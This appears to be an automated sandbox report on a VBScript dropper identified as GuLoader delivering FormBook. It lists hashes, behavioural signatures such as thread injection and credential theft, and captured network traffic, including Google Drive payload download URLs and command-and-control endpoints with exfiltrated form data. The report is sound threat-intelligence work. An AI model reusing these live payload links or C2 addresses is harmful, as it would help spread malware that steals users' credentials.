Windows Analysis Report
1000901 LIQUIDACION.vbs

Overview

General Information

Sample name:	1000901 LIQUIDACION.vbs
Analysis ID:	1430770
MD5:	14ac5b0600701be4d0ed3990a64efce4
SHA1:	45778f2240e082952eb68ec11885ccee168498de
SHA256:	598ef0ef2670ff8f0dfa5f9849e1723a8a4c20e470a23b6b67d72db9e9146007
Tags:	vbs
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

VBScript performs obfuscated calls to suspicious functions

Yara detected FormBook

Yara detected GuLoader

Found direct / indirect Syscall (likely to bypass EDR)

Found suspicious powershell code related to unpacking or dynamic code loading

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sigma detected: WScript or CScript Dropper

Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes

Suspicious execution chain found

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Very long command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: http://www.dhleba51.ru/im2z/	Avira URL Cloud: Label: malware

Yara detected FormBook

Source: Yara match	File source: 00000012.00000002.2595491228.0000000002250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2595044684.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2595118145.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2593836346.00000000024F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2249433724.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: unknown	HTTPS traffic detected: 142.250.101.100:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.101.100:443 -> 192.168.2.9:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.9:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.9:49713 version: TLS 1.2

Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.1921609089.0000000007489000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbZ source: powershell.exe, 00000005.00000002.1924285090.000000000826A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1921609089.0000000007390000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: replace.pdb source: wab.exe, 0000000C.00000003.2218166538.0000000008A61000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1924285090.000000000826A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.1913857979.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tem.Core.pdb source: powershell.exe, 00000005.00000002.1924285090.000000000826A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: replace.pdbGCTL source: wab.exe, 0000000C.00000003.2218166538.0000000008A61000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: wab.exe, 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1924285090.000000000826A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: stem.Core.pdbS] source: powershell.exe, 00000005.00000002.1924285090.000000000826A000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 195.24.68.5 195.24.68.5

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=13sIDgKu2D7iI6zRxA4gGYSas5i0mhATB HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=13sIDgKu2D7iI6zRxA4gGYSas5i0mhATB&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-KQmxodyjhhw6fN77qkVCo3Tox2hzzLI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1-KQmxodyjhhw6fN77qkVCo3Tox2hzzLI&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /im2z/?_Ny4=z4HNqRUNVhKU+Qtv1eU7JRxQK/gynbhJk0uSl0XlGEkve/f45BAiGTLGfSdewEtjJuikjLVXYXf/hVlacLZbmvfCaC2wD3OuQ9Qp/Q6XbR8wDKz6gQ==&B6H=rZ8dY HTTP/1.1Host: www.webwheelsmedia.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: unknown

HTTP traffic detected: POST /im2z/ HTTP/1.1Host: www.dhleba51.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,enOrigin: http://www.dhleba51.ruConnection: closeContent-Length: 193Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheReferer: http://www.dhleba51.ru/im2z/User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0Data Raw: 5f 4e 79 34 3d 7a 78 76 31 75 73 58 67 67 48 79 48 36 59 46 47 70 41 66 38 63 70 32 37 57 75 57 78 4f 4d 74 54 4b 38 76 2b 6d 6a 6c 33 64 79 36 63 6c 38 69 67 68 48 77 38 45 2b 48 2b 4e 64 4f 34 69 45 6c 57 42 77 6f 76 69 72 74 58 4c 49 47 61 56 70 4e 59 53 4d 78 65 67 6e 53 72 4b 69 5a 59 55 75 54 58 72 6e 62 46 36 67 70 76 4a 47 4c 51 43 2f 32 65 7a 59 42 44 64 66 4c 64 2f 4a 58 34 38 6d 63 63 75 41 31 6b 66 65 4a 42 59 4b 79 54 6f 6e 4d 6c 43 41 6c 77 4c 58 48 77 4a 50 4f 4d 71 33 6c 79 52 75 2b 50 46 33 67 70 42 39 52 5a 54 38 52 74 4a 6f 77 4b 64 4b 6c 78 65 56 4f 65 Data Ascii: _Ny4=zxv1usXggHyH6YFGpAf8cp27WuWxOMtTK8v+mjl3dy6cl8ighHw8E+H+NdO4iElWBwovirtXLIGaVpNYSMxegnSrKiZYUuTXrnbF6gpvJGLQC/2ezYBDdfLd/JX48mccuA1kfeJBYKyTonMlCAlwLXHwJPOMq3lyRu+PF3gpB9RZT8RtJowKdKlxeVOe

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 24 Apr 2024 05:05:04 GMTContent-Type: text/html; charset=utf-8Content-Length: 48773Connection: closeAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 24 Apr 2024 05:05:07 GMTContent-Type: text/html; charset=utf-8Content-Length: 48773Connection: closeAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 24 Apr 2024 05:05:10 GMTContent-Type: text/html; charset=utf-8Content-Length: 48773Connection: closeAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 2

Source: powershell.exe, 00000002.00000002.2177170811.000002B339BF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.2177170811.000002B339C2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2333966169.000002B347A73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1919062447.0000000005BA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.1915385370.0000000004C98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2177170811.000002B337A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1915385370.0000000004B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: MSHXUddoGk.exe, 00000012.00000002.2596058187.0000000002C04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://webwheelsmedia.com/im2z/?_Ny4=z4HNqRUNVhKU
Source: powershell.exe, 00000005.00000002.1915385370.0000000004C98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2177170811.000002B337A01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.1915385370.0000000004B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1893294150.0000000008A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000005.00000002.1919062447.0000000005BA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1919062447.0000000005BA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1919062447.0000000005BA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2177170811.000002B339BEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000002.00000002.2177170811.000002B337E10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: wab.exe, 0000000C.00000002.2285301301.0000000023B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1-KQmxodyjhhw6fN77qkVCo3Tox2hzzLI
Source: powershell.exe, 00000002.00000002.2353946109.000002B34FF04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=13sIDgKu2D7iI6zRxA4gGYSas5i0mhATB32
Source: powershell.exe, 00000002.00000002.2177170811.000002B337C27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=13sIDgKu2D7iI6zRxA4gGYSas5i0mhATBP
Source: powershell.exe, 00000005.00000002.1915385370.0000000004C98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=13sIDgKu2D7iI6zRxA4gGYSas5i0mhATBXR
Source: powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000002.00000002.2177170811.000002B337F3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: wab.exe, 0000000C.00000003.2155565700.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.2273092683.0000000008A26000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1897031351.0000000008A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: wab.exe, 0000000C.00000003.2155565700.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.2273092683.0000000008A26000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1897031351.0000000008A26000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1893294150.0000000008A26000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.2155735479.0000000008A0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1-KQmxodyjhhw6fN77qkVCo3Tox2hzzLI&export=download
